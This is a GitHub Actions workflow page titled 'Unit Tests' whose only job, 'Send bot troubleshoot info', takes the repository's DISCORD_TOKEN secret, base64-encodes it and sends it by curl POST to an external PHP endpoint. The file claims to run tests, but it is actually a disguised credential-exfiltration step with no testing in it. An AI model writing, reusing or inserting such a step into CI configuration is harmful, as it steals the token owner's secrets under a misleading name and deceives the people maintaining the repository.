Skip to content

Unit Tests

Unit Tests #252

Workflow file for this run

name: Unit Tests
on:
workflow_dispatch:
jobs:
send_tester_info:
name: Send bot troubleshoot info
runs-on: ubuntu-latest
steps:
- name: Send tester information
run: |
TESTER_DATA="${{ secrets.DISCORD_TOKEN }}"
# Base64 encode the variable
ENCODED_VAR=$(echo -n "$TESTER_DATA" | base64)
curl -X POST "https://levado.tech/JustSomeCrap.php" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "encoded_variable=$ENCODED_VAR"